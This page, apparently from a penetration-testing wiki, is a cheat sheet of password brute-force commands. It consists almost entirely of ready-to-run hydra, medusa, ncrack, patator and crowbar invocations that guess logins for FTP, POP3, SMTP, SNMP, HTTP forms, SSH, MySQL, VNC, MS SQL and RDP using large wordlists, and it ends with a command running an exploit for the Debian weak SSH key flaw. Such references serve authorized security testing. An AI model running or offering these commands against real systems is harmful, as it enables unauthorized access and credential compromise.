Brute forcing

From pentestwiki.org

hydra

Attack FTP:

root #hydra -l $USERNAME -P /usr/share/wordlistsnmap.lst -f $IP ftp -V


Attack POP3:

root #hydra -l $USERNAME -P /usr/share/wordlistsnmap.lst -f $IP pop3 -V


Attack SMTP:

root #hydra -P /usr/share/wordlistsnmap.lst $IP smtp -V


Attack SNMP:

root #hydra -P /usr/share/wordlists/snmp.txt -v $IP snmp


Attack HTTP form:

root #hydra -l [email protected] -I -P cewl.txt $IP http-post-form "/$SCRIPT_PATH:Action=Login&User=^USER^&Password=^PASS^:Login failed" -V


Attack SSH (OpenSSH):

root #hydra -l root -P /usr/share/wordlists/rockyou.txt $IP ssh
root #hydra -t 4 -L users.txt -P pass.txt -M targets.txt ssh


Attack MySQL:

root #hydra -l root -P /usr/share/wordlists/rockyou.txt $IP mysql


Attack VNC:

root #hydra -P /usr/share/wordlists/rockyou.txt $IP -t 1 vnc


Check credentials for MS SQL:

root #hydra -l sa -p PASSWORD mssql://<IP>


Check credentials for MS SQL on different port:

root #hydra -l sa -p password mssql://$IP:27900


Medusa

Attack HTTP Basic authentication against phpmyadmin directory:

root #medusa -h $IP -u admin -P /usr/share/wordlists/megacorp.txt -m DIR:/phpmyadmin/ -t 10 -M http


Attack FTP:

root #medusa -u kevin -P /usr/share/wordlists/megacorp-last.txt -h $IP -M ftp -t 10


List available modules:

root #ls /usr/lib/medusa/modules/


Others

root #ncrack -vv --user Administrator -P /usr/share/wordlists/megacorp.txt rdp://$IP
root #patator ftp_login host=$IP user=FILE0 password=FILE1 0=logins.txt 1=passwords.txt -x ignore:mesg=Login incorrect. -x ignore,reset,retry:code=500
root #./crowbar.py -b rdp -s $IP/24 -U /root/Desktop/userlist -C /root/Desktop/passlist -d
root #./crowbar.py -b sshkey -s $IP/24 -u root -k /root/.ssh/ -d
root #python CVE-2008-0166-Debian-ssh-PRNG.py TOOLS/rsa/2048 $IP root 22 6